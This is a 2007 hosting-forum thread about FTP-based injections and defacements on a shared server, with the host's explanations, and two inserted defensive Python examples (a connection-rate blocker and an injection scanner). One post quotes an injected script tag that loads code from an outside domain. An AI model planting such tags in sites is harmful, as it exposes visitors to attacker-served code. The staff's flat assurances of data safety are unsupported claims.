
23-04-2007, 19:47
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,405
|
|
Hello Brian,
Have you faced any problems in the last 24 hours?
I am mainly looking for FTP problems and injections, so let me know if you had any problems in the last 24 hours.
__________________
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
|

23-04-2007, 20:10
|
 |
Premium Member
|
|
Join Date: Nov 2005
Location: New Mexico
Posts: 669
|
|
Just around 24hrs ago I noticed a problem but just reuploaded my website hosting. Nothing has happened since. Good luck with stopping all this BS!
|

24-04-2007, 07:21
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 343
|
|
It's happened again
Index.html changed again - at 23:12 last night (server time is 1 hr behind so that's 00:12 this am). Whole load of pharmacy links to www.math.uchicago.edu/
So much for new secure server
Regards
David
|

24-04-2007, 07:40
|
|
Premium Member
|
|
Join Date: May 2006
Location: Cambridgeshire
Posts: 410
|
|
It would be worth running an antivirus scan on your computer to ensure that there isn't any keylogging software installed which could allow hackers to discover your login/FTP details. Also it would be worth checking the website hosting affected for any files which could be used by hackers to gain entry to the website hosting. If other website hostings aren't affected then I'm inclined to think that the hackers have found a way into your website hosting rather than the server.
|

24-04-2007, 07:56
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 343
|
|
I don't think so
I don't think it's just my website hosting - I just checked some other website hostings on Jaguar (not mine) and they have similar added code
David
Ps could anyone else on Jaguar confirm this?
|

24-04-2007, 17:45
|
|
Junior Member
|
|
Join Date: Apr 2007
Posts: 15
|
|
Something someone suggested to me was to change permissions on the affected files to 444 from 644. I certainly haven't received an attack since doing this (although, this does coincide with being moved servers).
|

24-04-2007, 17:47
|
|
Junior Member
|
|
Join Date: Apr 2007
Posts: 15
|
|
Quote:
Originally Posted by Eidolon
It would be worth running an antivirus scan on your computer to ensure that there isn't any keylogging software installed which could allow hackers to discover your login/FTP details. Also it would be worth checking the website hosting affected for any files which could be used by hackers to gain entry to the website hosting. If other website hostings aren't affected then I'm inclined to think that the hackers have found a way into your website hosting rather than the server.
|
The only problem with this is that I was receiving identical injections. I even changed all my FTP logins that could have been responsible and it happened again. Hence I'm inclined to think it's a server issue.
My dad (also a webmaster) had a similar problem on a different host a couple of years back. It was always his index.php/html that got targeted. Thus I think it's a script targeting index/other crucial files.
He eventually countered the problem using 444 permissions, but this doesn't render the server any more secure unfortunately.
|

24-04-2007, 20:38
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,405
|
|
It was a kernel exploit when your dad experienced this problem, but this time it's an FTP exploit. This exploit has been discovered recently and that's the reason it is taking some time to get a permanent solution for it, but make sure that you don't leave anything with 777 permission as of now, as 777 permission is an open invitation for injections.
If you see anything suspicious then let me know that in detail as I would like to investigate how this has been possible. OS, software version and kernel version is new so serverwide injection is not possible as of now.
|

24-04-2007, 20:54
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 343
|
|
I supplied details at 08:25 this morning on ticket #ENS-95952-191 - no response as yet!
Do you want more details?
|

24-04-2007, 21:14
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,405
|
|
Your ticket was moved in ownership of Nick (our CTO) and he will need some time to trace how exactly those were injected.
If you need a reply then I will ask someone to reply, but it won't help until the investigation work of Nick gets completed.
|

24-04-2007, 22:40
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 343
|
|
Don't need a reply - nice to know something is being done though.
Thanks
|

25-04-2007, 07:59
|
|
Junior Member
|
|
Join Date: Nov 2006
Posts: 24
|
|
Quote:
Originally Posted by Rock
Deep,
Such incidents are most of the time rumours/hoaxes, nothing to worry about them.
Our servers are well equipped to fight against such hack attempts & to keep them at bay. We have various tools (firewalls) running on our servers to monitor such events. None of our servers have been yet hacked, but unfortunately (as hairyfreak said) few website hostings are hacked due to insecure permissions set on files by their owners/webadmins.
If you received any such email from the hackers, please have it forwarded to our support dept.
|
Oh, what's going on here
Thank you, I don't know what happened to jaguar server or any defaces, on our website hostings we have more than 40000 users, emails and personal information, defacing the first page is just something like static hacking, fortunately till now we didn't have any deface, I worry about database and personal information of users, you know if they can access the files so it's easy to read sources and extract db password, oh I can't even think about that,
I hope nothing happens in future,
Thanks
|

25-04-2007, 08:04
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 343
|
|
Latest on the Hacks on Jaguar
Received this reply from Nick about the latest attacks on Jaguar
Quote:
Hello David,
I apologize for replying late.
Yes it was done using the same method of BFD and password crack.
Pure-FTPd is a fast, production-quality and standards-compliant FTP server.
Pure-FTPd contains a bug in the accept_client function handling the setup of new connections. When the maximum number of connections is reached an attacker could exploit this vulnerability to perform a Denial of Service attack or Brute Force Attack. There is no known workaround at this time.
The only solution is to upgrade the pure-ftpd version to latest stable version pure-ftpd v1.0.21 which is already done.
Also, we have installed the BFD on server and reduced the number of connections per IP address per sec. This will block the IP if there are more than 4 connections per IP per sec.
I am still investigating it and would update you if there are any configuration changes made on server.
Regards,
NickJ
Senior Admin
Support Team.
|
So I guess the attacks may well continue - and all we can do is check website hostings every day and perhaps change passwords every day. As I have well over 60 website hostings on this server that is a lot of checking and cleaning to do every day - my business is starting to suffer due to all this extremely time consuming extra work!
David
Ps What is BFD (I thought it was Brute Force something - but as Nick says it's installed on the server I guess not)
|
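The rule quoted in the reply above (block an IP once it makes more than 4 connections in a second) can be expressed as a sliding-window check over connection events. This is an added example, not the host's configuration or BFD's own code; the log layout, the function name `ips_to_block` and the sample addresses are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

MAX_PER_SEC = 4  # from the quoted reply: block above 4 connections per IP per sec

# Constructed sample; the "timestamp ip event" layout is an assumption and is
# not the real Pure-FTPd or BFD log format. Addresses are documentation ranges.
SAMPLE_LOG = """\
2007-04-24T23:12:00.000 203.0.113.7 connect
2007-04-24T23:12:00.200 203.0.113.7 connect
2007-04-24T23:12:00.400 203.0.113.7 connect
2007-04-24T23:12:00.500 198.51.100.9 connect
2007-04-24T23:12:00.600 203.0.113.7 connect
2007-04-24T23:12:00.800 203.0.113.7 connect
2007-04-24T23:12:01.500 198.51.100.9 connect
2007-04-24T23:12:02.500 198.51.100.9 connect
2007-04-24T23:12:03.500 198.51.100.9 connect
2007-04-24T23:12:04.500 198.51.100.9 connect
2007-04-24T23:12:05.000 192.0.2.5 connect
2007-04-24T23:12:05.100 192.0.2.5 connect
2007-04-24T23:12:05.200 192.0.2.5 connect
2007-04-24T23:12:05.300 192.0.2.5 connect
2007-04-24T23:12:06.000 192.0.2.5 connect
"""

def ips_to_block(lines, limit=MAX_PER_SEC, window=timedelta(seconds=1)):
    """Map each offending IP to the time it first exceeded `limit` per window."""
    recent = defaultdict(deque)   # ip -> connection times inside the window
    blocked = {}
    for line in lines:
        parts = line.split()
        if len(parts) != 3 or parts[2] != "connect" or parts[1] in blocked:
            continue              # skip malformed lines and already-blocked IPs
        ts, ip = datetime.fromisoformat(parts[0]), parts[1]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] >= window:  # drop connections older than one second
            q.popleft()
        if len(q) > limit:          # 5th connection inside one second
            blocked[ip] = ts
    return blocked

if __name__ == "__main__":
    for ip, when in ips_to_block(SAMPLE_LOG.splitlines()).items():
        print("block", ip, "at", when.isoformat())
```

Only the client that opens five connections inside one second is flagged; the client that makes exactly four in a second, and the one that connects once per second, stay under the limit.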

25-04-2007, 09:09
|
|
Premium Member
|
|
Join Date: May 2006
Location: Cambridgeshire
Posts: 410
|
|
BFD - Brute Force Detection
|

25-04-2007, 11:59
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,405
|
|
Quote:
Originally Posted by deep
Oh, what's going on here
Thank you, I don't know what happened to jaguar server or any defaces, on our website hostings we have more than 40000 users, emails and personal information, defacing the first page is just something like static hacking, fortunately till now we didn't have any deface, I worry about database and personal information of users, you know if they can access the files so it's easy to read sources and extract db password, oh I can't even think about that,
I hope nothing happens in future,
Thanks
|
I can understand questions which have got raised in your mind due to this problem but let me clarify that the database is safe and will remain so. FTP users can never access database and it is next to impossible to inject or read entries in MySQL Server databases without authentication of the database owner.
You don't need to be so concerned about privacy of your data as we are here to protect your private data. I do agree that public content was affected due to this problem but none of your private data was tampered.
|

25-04-2007, 12:28
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 343
|
|
What should happen next
As responsible hosts should you be sending an email to all admin contacts for domains on that server to:
a) Tell them about the problem
b) Ask them to clean their sites
c) Suggest they change password
d) Check regularly for new attacks
e) Check that no ftp accounts have been added
f) Reassure them about data integrity
Whilst some of the stuff is essentially harmless (broken links to script files) it might not always be. The rest of the stuff is not harmless to have on your website hosting - it can lead, as we have seen, to being blacklisted by Google, harming your company's reputation (search for my company on Google in Russian and you get thousands of porn results!! - lucky I'm not planning on expanding to Russia). So cleaning website hostings is essential.
David
|

25-04-2007, 12:36
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,405
|
|
Injection occurred on less than 30 website hostings on the server so it's not feasible to bother all customers. As a responsible host it's our responsibility to create no inconvenience for customers, so every 24 - 48 hours we run a script that checks iframe injection and we manually replace if something new was found.
As of now the volume has reduced and seems like the team putting its efforts on our server is losing its patience now as all their IPs have got blocked on the server.
Some of our customers know how we take care of our jobs as our support team emails them and phone support staff calls all customers on respective server when something happens on serverside resulting in problems for all customers on that particular server.
|
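A periodic check of the kind described in the post above, combined with the earlier advice in the thread not to leave anything at 777, could look like the following. This is an added example and not the host's own script: the function names, the allowlist parameter and the sample site (with placeholder `.example` hosts) are assumptions constructed for illustration.

```python
import os, re, stat, tempfile
from urllib.parse import urlparse

# iframe/script tags that load from a URL: the injection pattern in this thread.
TAG_SRC = re.compile(r'<(iframe|script)\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
PAGE_EXT = (".html", ".htm", ".php")

def scan_docroot(root, allowed_hosts):
    """Return sorted (relative path, finding) tuples for one site's docroot."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = os.stat(path).st_mode
            if mode & stat.S_IWOTH:  # writable by any local user, e.g. 777
                findings.append((rel, "world-writable %o" % stat.S_IMODE(mode)))
            if not name.lower().endswith(PAGE_EXT):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for tag, src in TAG_SRC.findall(text):
                host = urlparse(src).hostname  # None for same-site relative URLs
                if host and host.lower() not in allowed_hosts:
                    findings.append((rel, "%s from %s" % (tag.lower(), host)))
    return sorted(findings)

def make_sample_site():
    """Build a constructed sample docroot (placeholder hosts) for a self-check."""
    root = tempfile.mkdtemp(prefix="docroot-")
    pages = {
        "index.html": '<h1>Shop</h1><script src="/js/site.js"></script>\n'
                      '<iframe src="http://injected.example/x" width=0></iframe>',
        "about.php": '<script type="text/javascript" '
                     'src="http://cdn.mysite.example/a.js"></script>',
        "upload.php": "<?php /* no markup */ ?>",
    }
    for name, body in pages.items():
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, 0o644)
    os.chmod(os.path.join(root, "upload.php"), 0o777)  # the risky setting
    return root

if __name__ == "__main__":
    for rel, what in scan_docroot(make_sample_site(), {"cdn.mysite.example"}):
        print(rel, "->", what)
```

Comparing tag sources against a per-site allowlist, rather than searching for one known bad domain, also catches an injection that switches to a new host.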

25-04-2007, 13:14
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 343
|
|
Hmm
Well the script injection looks to have occurred on a lot more than 30 website hostings. I know that the script file it points to doesn't appear to be there at the moment - but there is nothing to stop them adding it to the server at gomyron.com - and then anything could be being served up to people's browsers.
And there are still some iframe tags out there live still
David
|

25-04-2007, 21:05
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,405
|
|
I've personally run some commands to see how many website hostings had iframe injection and it was surely below 30. I never took any screenshot to prove my words.
Please explain what's wrong with gomyron.com as this domain seems to be hosted somewhere else.
|

25-04-2007, 23:07
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 343
|
|
That's the source for script
The following lines have been added to quite a few sites
script type="text/javascript" language="JavaScript" src="http://jsp.gomyron.com/functions.js.php?type=popexit&link=http://gomyron.com/MTU1NTI=/2/4811//"></script>
Which like I say could do anything - it doesn't cos script doesn't appear to be there at the moment - but the bad guys could put it there - to do whatever they want.
I'm sure I've seen that on more than 30 sites
Last edited by DavidAllen; 25-04-2007 at 23:10.
|